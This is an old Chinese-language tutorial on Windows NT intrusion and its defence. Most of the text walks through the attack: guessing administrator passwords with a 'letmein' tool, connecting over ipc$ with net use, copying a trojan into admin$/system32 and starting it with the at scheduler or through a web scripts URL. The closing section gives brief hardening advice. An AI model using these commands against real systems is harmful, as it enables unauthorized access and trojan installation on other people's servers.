防止远程入侵Windows NT

防止远程入侵Windows NT 作者:Billows     1999/03/12

微软推出的Windows NT系统平台，曾经在网络组建上风靡一时，至今还有许多的网络系统使用它，但它的网络漏洞在微软的不断补丁下依然存在，每当我们为它打上微软的补丁后，新的漏洞又出现了。而利用这些漏洞进行网络远端入侵也是相当简单的事了。 现在我们来看看如何远端入侵Windows NT主机！ 攻击步骤： 首先，我们要攻击远端目标当然得知道对方得IP地址了，你可以使用各种扫描工具查找目标机器的IP地址，这里因为重点不是它所以就不多说了。 在确定攻击目标后，使用Windows NT自带的命令取得远端目标的用户列表资源，分析取得的列表资源，尝试取得管理员权限。letmein命令用于通过指定的密码远程登录服务器，并读取服务器上的用户信息，配以不同的参数，可以获取相应的控制权。例如： letmein file://x.x.x.x/ -all -g mypwd(将查看//x.x.x.x上的所有用户账户列表，并试图通过参数后面跟随的密码取得管理员的控制权) letmein file://x.x.x.x/ -admin -g mypwd (可以查看//x.x.x.x上管理员的账户列表，并试图通过参数后面跟随的密码取得管理员的控制权。) letmein file://x.x.x.x/ -all -d mypwd (试图通过参数后面跟随的密码取得用户控制权，并显示//x.x.x.x上所有用户名列表。) 当使用letmein命令获取相关管理员权限后，使用Windows提供的标准命令连接远程资源并将木马拷入远程目标，你可以使用的木马是很多的，这里不作介绍了，具体的命令是： net use //x.x.x.x/ipc$ "pass"/user:"user" (利用刚刚猜解到的用户名和密码登录//x.x.x.x主机) copy x:/netserver.exe //x.x.x.x/admin$/system32(拷贝本地木马程序netserver.exe到远端//x.x.x.x的管理员目录下) 再使用合法Windows NT命令远程启动刚才考入的木马程序： netsvc //x.x.x.x schedule /start at //x.x.x.x hh:mm netserver.exe/port:yourport /nomsg 在上面的命令中利用了Windows NT的任务计划管理，在指定的时间和指定的端口运行木马程序。 另一种方法： 将需要运行的木马或其他可执行程序Copy到远端服务器的www可执行目录下( 如cgi-bin或scripts等)，然后在浏览器键入远端连接url来运行木马程序，如：http://x.x.x.x/scripts/ntsrver.exe/port:yourport或http://x.x.x.x/cgi-gin/ntsrver.exe/port:yourport等。 到此，该次入侵可以算成功了，远程资源已在自己的控制下。 攻击原理： 简单分析一下这次攻击的过程，不难看出，关键步骤是利用letmein取得admin权限，但是很不幸，就目前部分的采用Windows NT系统平台服务器而言，所采用的网络管理密码，利用破解工具仅仅多花几分钟就能破解掉。同时，通过对某些大的公共平台服务器进行测试扫描的结果，使用Windows NT系统平台的服务器，其管理密码被letmein猜中率有75%以上。而且在这些被进入的机器上，SMB(文件和打印共享)又都是运行在TCP/IP协议上，而且只有部分服务器有配备火墙，一般没有封闭对外的137∽139端口，从而给网络入侵留下了后门。 防范措施： 1.管理人员应该及时检查日记和监控服务的运行，定时对文件系统的权限受托关系进行检查。 2.对密码的选择有一个好的习惯。一个好的密码必须包括下面的内容：好记忆、不易被猜到、易输入，至于怎么才能作到，很多文章都有介绍的，这里就不多讲。 3.适当配置NT网络服务，特别是TCP/IP协议，尽量不要在对外的服务上绑定共享服务。 4.防火墙的配置要合理，屏蔽一切不需要的服务端口，像在TCP/IP上的137∽139端口，开这些端口只会使你的系统处于危险的处境，如果必须要在远程使用这些端口的服务，建议使用其他软件来代替，而不是单纯使用系统内定的服务。